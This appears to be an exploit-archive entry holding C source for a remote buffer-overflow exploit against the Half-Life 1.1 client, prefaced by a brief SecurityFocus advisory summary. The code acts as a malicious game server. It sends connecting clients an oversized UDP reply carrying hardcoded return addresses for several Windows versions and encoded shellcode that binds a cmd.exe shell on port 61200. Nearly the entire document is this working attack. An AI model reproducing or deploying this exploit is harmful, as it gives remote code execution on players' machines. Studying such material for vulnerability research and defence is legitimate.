Valve Software Half-Life 1.1 Client - Connection Routine Buffer Overflow (1)

// source: https://www.securityfocus.com/bid/8299/info

// Half-Life Client has been reported prone to a remotely exploitable buffer overflow condition.

// The issue presents itself in the client connection routine, used by the client to negotiate a connection to the Half-Life game server. Due to a lack of sufficient bounds checking performed on both the parameter and value of data transmitted from the game server to the client, a malicious server may execute arbitrary code on an affected client.

/*
 *            m00 Security presents
 *  HalfLife client <=v.1.1.1.0 remote exploit
 *
 *  binds cmd.exe shell on port 61200
 *
 *  Avaiable targets:
 *   1. win2k sp3 en
 *   2. winxp nosp ru
 *   3. winxp sp1 ru
 *   4. win98 se2 (u need change shellcode)
 *
 *  Bug discovered by
 *    Auriemma Luigi [www.pivx.com/luigi]
 *
 *  Authors:
 *    d4rkgr3y [grey_1999_at_mail.ru]
 *    Over_G [overg_at_mail.ru]
 *
 *  U can find us at:
 *    irc.wom.ru@m00
 *    irc.dal.net@m00security
 *
 * PS: m00security.org will be avaiable soon ;)
*/


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <arpa/inet.h>
#include <netdb.h>

#define PORT 27015

char ping[0x12]=
	"\xff\xff\xff\xff\x6a\x00\x20\x20\x20"
	"\x20\x20\x20\x20\x20\x20\x20\x20\x20";

unsigned char evilbuf[] =
	/* header of HalfLife udp-datagram | do not edit */
	"\xFF\xFF\xFF\xFF\x69\x6E\x66\x6F\x73\x74\x72\x69"
	"\x6E\x67\x72\x65\x73\x70\x6F\x6E\x73\x65\x00\x5c"
	/* 512 bytes for bof */
	"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
	"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
	"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
	"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
	"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
	"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
	"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
	"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
	"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
	"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
	"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
	"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
	"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
	"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
	"AAAAAAAAAAAAAAAAAAAAAA"
	"\x5a\x5a\x5a\x5a" // EIP
	"\x90\x90\x90\x90" // payload for esp
	/* winxp/2k xored portbind shellcode */
	/* If u want to use this xsploit against win9x/ME, change shellcode to another one */
	"\x8B\xC4\x83\xC0\x15\x33\xC9\x66\xB9\xD1\x01\x80\x30\x96\x40\xE2\xFA" // decrypt
	"\x15\x7A\xA2\x1D\x62\x7E\xD1\x97\x96\x96\x1F\x90\x69\xA0\xFE\x18\xD8\x98\x7A\x7E\xF7"
	"\x97\x96\x96\x1F\xD0\x9E\x69\xA0\xFE\x3B\x4F\x93\x58\x7E\xC4\x97\x96\x96\x1F\xD0"
	"\x9A\xFE\xFA\xFA\x96\x96\xFE\xA5\xA4\xB8\xF2\xFE\xE1\xE5\xA4\xC9\xC2\x69\xC0\x9E"
	"\x1F\xD0\x92\x69\xA0\xFE\xE4\x68\x25\x80\x7E\xBB\x97\x96\x96\x1F\xD0\x86\x69\xA0"
	"\xFE\xE8\x4E\x74\xE5\x7E\x88\x97\x96\x96\x1F\xD0\x82\x69\xE0\x92\xFE\x5D\x7B\x6A"
	"\xAD\x7E\x98\x97\x96\x96\x1F\xD0\x8E\x69\xE0\x92\xFE\x4F\x9F\x63\x3B\x7E\x68\x96"
	"\x96\x96\x1F\xD0\x8A\x69\xE0\x92\xFE\x32\x8C\xE6\x51\x7E\x78\x96\x96\x96\x1F\xD0"
	"\xB6\x69\xE0\x92\xFE\x32\x3B\xB8\x7F\x7E\x48\x96\x96\x96\x1F\xD0\xB2\x69\xE0\x92"
	"\xFE\x73\xDF\x10\xDF\x7E\x58\x96\x96\x96\x1F\xD0\xBE\x69\xE0\x92\xFE\x71\xEF\x50"
	"\xEF\x7E\x28\x96\x96\x96\x1F\xD0\xBA\xA5\x69\x17\x7A\x06\x97\x96\x96\xC2\xFE\x97"
	"\x97\x96\x96\x69\xC0\x8E\xC6\xC6\xC6\xC6\xD6\xC6\xD6\xC6\x69\xC0\x8A\x1D\x4E\xC1"
	"\xC1\xFE\x94\x96\x79\x86\x1D\x5A\xFC\x80\xC7\xC5\x69\xC0\xB6\xC1\xC5\x69\xC0\xB2"
	"\xC1\xC7\xC5\x69\xC0\xBE\x1D\x46\xFE\xF3\xEE\xF3\x96\xFE\xF5\xFB\xF2\xB8\x1F\xF0"
	"\xA6\x15\x7A\xC2\x1B\xAA\xB2\xA5\x56\xA5\x5F\x15\x57\x83\x3D\x74\x6B\x50\xD2\xB2"
	"\x86\xD2\x68\xD2\xB2\xAB\x1F\xC2\xB2\xDE\x1F\xC2\xB2\xDA\x1F\xC2\xB2\xC6\x1B\xD2"
	"\xB2\x86\xC2\xC6\xC7\xC7\xC7\xFC\x97\xC7\xC7\x69\xE0\xA6\xC7\x69\xC0\x86\x1D\x5A"
	"\xFC\x69\x69\xA7\x69\xC0\x9A\x1D\x5E\xC1\x69\xC0\xBA\x69\xC0\x82\xC3\xC0\xF2\x37"
	"\xA6\x96\x96\x96\x13\x56\xEE\x9A\x1D\xD6\x9A\x1D\xE6\x8A\x3B\x1D\xFE\x9E\x7D\x9F"
	"\x1D\xD6\xA2\x1D\x3E\x2E\x96\x96\x96\x1D\x53\xC8\xCB\x54\x92\x96\xC5\xC3\xC0\xC1"
	"\x1D\xFA\xB2\x8E\x1D\xD3\xAA\x1D\xC2\x93\xEE\x95\x43\x1D\xDC\x8E\x1D\xCC\xB6\x95"
	"\x4B\x75\xA4\xDF\x1D\xA2\x1D\x95\x63\xA5\x69\x6A\xA5\x56\x3A\xAC\x52\xE2\x91\x57"
	"\x59\x9B\x95\x6E\x7D\x64\xAD\xEA\xB2\x82\xE3\x77\x1D\xCC\xB2\x95\x4B\xF0\x1D\x9A"
	"\xDD\x1D\xCC\x8A\x95\x4B\x1D\x92\x1D\x95\x53\x7D\x94\xA5\x56\x1D\x43\xC9\xC8\xCB"
	"\xCD\x54\x92\x96"
	/* end */
	"\x5C\x00"; // end of udp-HL-datagram. Do not change!

char retw2ksp3[] = "\xc5\xaf\xe2\x77";
char retwxpsp0[] = "\x1c\x80\xf5\x77"; // ntdll.dll :: jmp esp
char retwxpsp1[] = "\xba\x26\xe6\x77";
char retw98se2[] = "\xa9\xbf\xda\x7f";

int main(int argc, char **argv) {
	int sock, sf, len, i;
	u_short port=PORT;
	struct sockaddr_in fukin_addr, rt;
	char buf[0x1000];
	printf("\n\rHalfLife client v.1.1.1.0 remote exploit by m00 Security\n");
	if(argc!=2) {
		printf("
Usage: %s <remote_os>

where os:
1 - win2k sp3 ru
2 - winxp nosp ru
3 - winxp sp1 ru
4 - win98 se2 ru (need another shellcode)

",argv[0]);
		exit(0);
	}
	if(atoi(argv[1])==1) {
		for(i=0;i<4;i++) {
			evilbuf[536+i]=retw2ksp3[i];
		}
	}
	if(atoi(argv[1])==2) {
		for(i=0;i<4;i++) {
			evilbuf[536+i]=retwxpsp0[i];
		}
	}
	if(atoi(argv[1])==3) {
		for(i=0;i<4;i++) {
			evilbuf[536+i]=retwxpsp1[i];
		}
	}
	if(atoi(argv[1])==4) {
		for(i=0;i<4;i++) {
			evilbuf[536+i]=retw98se2[i];
		}
	}

	if((sock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP))<0) {
		perror("[-] socket()");
		exit(0);
	}
	printf("\n[+] Socket created.\n");
	fukin_addr.sin_addr.s_addr = INADDR_ANY;
	fukin_addr.sin_port        = htons(port);
	fukin_addr.sin_family      = AF_INET;

	if(bind(sock, (struct sockaddr *)&fukin_addr, sizeof(fukin_addr))<0) {
		perror("[-] bind()");
		exit(0);
	}
	printf("[+] Port %i binded.\n", port);
	sf = sizeof(rt);
	while(1) {
		if ((len = recvfrom(sock, buf, sizeof(buf), 0, (struct sockaddr *)&rt, &sf))<0) {
			perror("[-] recv()");
			exit(1);
		}
		printf("[+] Incoming udp datagram: ");
 		for (i=0;i<=len;i++){
			printf("%c",buf[i]);
		}
		printf("\n[~] Identyfication... ");
		if(strstr(buf,"ping")) {
			printf("PING request\n[~] Sending answer... ");
			if(sendto(sock, ping, sizeof(ping), 0, (struct sockaddr *)&rt, sizeof(rt))<0) {
				perror("[-] send()");
				exit(1);
			} else {
				printf("OK\n");
			}
			continue;
		}
		if(strstr(buf,"infostring")) {
			printf("INFOSTRING request\n[~] Attacking... OK\n");
			printf("[+] Now try to connect to: %s:61200\n", inet_ntoa(rt.sin_addr));
			if(sendto(sock, evilbuf, sizeof(evilbuf), 0, (struct sockaddr *)&rt, sizeof(rt))<0) {
				perror("[-] send()");
				exit(1);
			}
			continue;
		}
		printf("unknow request\n");
	}
	close(sock);
	return 0;
}
// mOOOOOOOOOOOOOoooooooooooooooooooooo